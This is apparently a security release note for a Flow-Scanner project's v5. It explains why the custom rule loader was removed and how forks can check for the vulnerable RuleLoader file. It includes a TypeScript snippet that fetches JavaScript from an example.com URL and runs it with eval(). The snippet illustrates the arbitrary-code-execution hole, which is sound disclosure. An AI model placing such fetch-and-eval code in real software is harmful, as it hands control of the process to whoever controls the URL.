# Security Patch

## 🚨 v5 - Security Patch

This release delivers security improvements and removes support for custom rules.
### Security Fixes

- Removed custom rule loader
  - Previous versions allowed configuration files to load JavaScript from external sources.
  - This created an arbitrary code execution (ACE) risk: a malicious config could execute arbitrary code.

    ```ts
    // Shape of the removed behaviour: a custom rule fetching remote JavaScript
    // and evaluating it at runtime, so whoever controls the URL controls the process.
    execute(flow: Flow, ruleOptions?: {}): RuleResult {
      fetch("https://example.com/script.js")
        .then(res => res.text())
        .then(code => {
          eval(code); // 🚨 ACE happens here
        });
      return null;
    }
    ```

  - In v5, this behavior has been completely removed. Only built-in rules are now supported.
- Removed dynamic paths in configuration
  - Config files can no longer point to external scripts or resources.
### 🛡️ Dependency & Audit Updates

- All dependencies updated to their latest secure versions.
- Applied `npm audit fix` to patch known vulnerabilities.
### Impact

- Custom rules functionality has been retired.
- All packages that relied on the custom rule loader have been unpublished.

**Note on forks:**

Using a fork? Check `node_modules/` for `RuleLoader.ts` or `RuleLoader.js`. If present, it's vulnerable.

For patched versions, see https://github.com/Flow-Scanner